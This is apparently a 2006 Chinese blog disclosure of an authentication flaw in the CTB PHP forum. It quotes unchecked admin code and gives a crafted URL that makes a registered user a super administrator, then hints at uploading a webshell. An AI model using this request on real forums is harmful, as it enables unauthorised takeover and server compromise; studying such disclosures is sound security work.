漂亮但不安全的CTB


Posted in PHP onOctober 09, 2006

>>>Dedicated This Scrap To CaoJing<<< 

涉及版本: 
^^^^^^^ 
目前所有版本(现在1.3Alpha为最高版本) 

描述: 
^^^^^^ 
CTB是一款由实易数码<11cn.org>;开发和维护的源代码开放的PHP论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。 

具体: 
^^^^ 
CTB书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧: 

试看如下代码: 

/admin/main.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 //获取get变量 
   if( is_array($_GET) ) { 
      foreach($_GET as $k=>$v) { 
           if( is_array( $_GET[$k]) ) { 
               foreach($_GET[$k] as $k2=>$v2) { 
                   $return[$k][$k2] = $v2; 
               } 
           } else { 
               $return[$k] = $v; 
           } 
       } 

... 
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod']; 
   if (!file_exists($mod.".php" { 
       $mod = "mainright"; 
   } 
   require_once ($mod.".php"; 
   //----------------------------------------------------------------------------- 

   //初始化类变量 
   $ctb = new Module; 
   $ctb->set = $set; 
   $ctb->tplPath = "./templates"; 
   $ctb->input = $return; 
   $ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION; 
   $ctb->execute(); 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

这里没有任何验证,我们看看添加管理员的文件: 

/admin/systemuser.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
class Module extends CommonClass 
//系统管理模块子类 

   function execute() { 
       switch($this->input['action']) { 
... 
case 'addSystemUser': 
               $this->addSystemUser(); 
               break; 
... 
    }       
   } 

function addSystemUser() 

   //输入数据简单格式化 
   $this->inputCheck("main.php?mod=systemuser&action=showSystemUser"; 
   //执行添加操作 
        $this->file = "../".$this->set[dataPath]."/users/list.php"; 
   $systemLine = $this->select(4, $this->input['systemUserName']); 
.... 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

依然没有验证,一路顺利啊! 

利用方法: 
^^^^^^^ 
先注册一个用户: 

登陆ID:  cat 
用户名 :   dog 
密码:      ilikecat 
重复密码:  ilikecat 
信箱:      cat@dog.com 

接着提交如下URL: 

http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

哈哈,你现在已经是超级管理员了,不相信?提交如下URL后台登陆: 

http://www.psych.com/ctb/admin/main.php?mod=login 

管理名称:  cat 
管理密码:  ilikecat 

咦...还真成功了! 

你现在是不是想更改后台上传文件类型,然后upload webshell?哼,被我猜到了吧... 

后记:另外发现CTB代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。

PHP 相关文章推荐
PHP小技巧搜集,每个PHPer都来露一手
Jan 02 PHP
PHP文件读写操作之文件写入代码
Jan 13 PHP
php遍历目录与文件夹的多种方法详解
Nov 14 PHP
Smarty变量调节器失效的解决办法
Aug 20 PHP
[原创]php获取数组中键值最大数组项的索引值
Mar 17 PHP
php编程中echo用逗号和用点号连接的区别
Mar 26 PHP
php array_values 返回数组的所有值详解及实例
Nov 12 PHP
php微信开发之百度天气预报
Nov 18 PHP
PHP生成各种随机验证码的方法总结【附demo源码】
Jun 05 PHP
PHP7数组的底层实现示例
Aug 25 PHP
Thinkphp5.0 框架Model模型简单用法分析
Oct 11 PHP
Laravel框架下的Contracts契约详解
Mar 17 PHP
自动跳转中英文页面
Oct 09 #PHP
随机头像PHP版
Oct 09 #PHP
1.PHP简介
Oct 09 #PHP
5.PHP的其他功能
Oct 09 #PHP
2.PHP入门
Oct 09 #PHP
4.与数据库的连接
Oct 09 #PHP
利用PHP创建动态图像
Oct 09 #PHP
You might like
php与python实现的线程池多线程爬虫功能示例
2016/10/12 PHP
php实现的http请求封装示例
2016/11/08 PHP
PHP laravel中的多对多关系实例详解
2017/06/07 PHP
thinkphp分页集成实例
2017/07/24 PHP
PHP Socket网络操作类定义与用法示例
2017/08/30 PHP
客户端 使用XML DOM加载json数据的方法
2010/09/28 Javascript
gridpanel动态加载数据的实例代码
2013/07/18 Javascript
js中把JSON字符串转换成JSON对象最好的方法
2014/03/21 Javascript
深入浅析jQuery对象$.html
2016/08/22 Javascript
微信小程序 开发指南详解
2016/09/27 Javascript
微信小程序封装http访问网络库实例代码
2017/05/24 Javascript
JS设计模式之数据访问对象模式的实例讲解
2017/09/30 Javascript
微信小程序的线程架构【推荐】
2019/05/14 Javascript
通过JS深度判断两个对象字段相同
2019/06/14 Javascript
一个手写的vue放大镜效果
2019/08/09 Javascript
Vue基于localStorage存储信息代码实例
2020/11/16 Javascript
[00:05]ChinaJoy现场 DOTA2玩家高呼“CN DOTA BEST DOTA”
2019/08/04 DOTA
python网络编程之TCP通信实例和socketserver框架使用例子
2014/04/25 Python
python基于queue和threading实现多线程下载实例
2014/10/08 Python
python3中bytes和string之间的互相转换
2017/02/09 Python
python制作mysql数据迁移脚本
2019/01/01 Python
python 串口读取+存储+输出处理实例
2019/12/26 Python
python 30行代码实现蚂蚁森林自动偷能量
2021/02/08 Python
css3一款3D字体带阴影效果的实现步骤
2013/03/20 HTML / CSS
详解CSS3中Media Queries的相关使用
2015/07/17 HTML / CSS
Senreve官网:美国旧金山的奢侈手袋品牌
2019/03/21 全球购物
自我鉴定怎么写
2014/01/12 职场文书
2014年党员创先争优承诺书
2014/05/29 职场文书
民间个人借款协议书
2014/09/30 职场文书
车辆委托书范本
2014/10/05 职场文书
2014年司机工作总结
2014/11/21 职场文书
2015年预防青少年违法犯罪工作总结
2015/05/22 职场文书
环保建议书作文300字
2015/09/14 职场文书
三八红旗手先进事迹材料(2016推荐版)
2016/02/25 职场文书
建立共青团委员会的请示
2019/04/02 职场文书
深入浅析python3 依赖倒置原则(示例代码)
2021/07/09 Python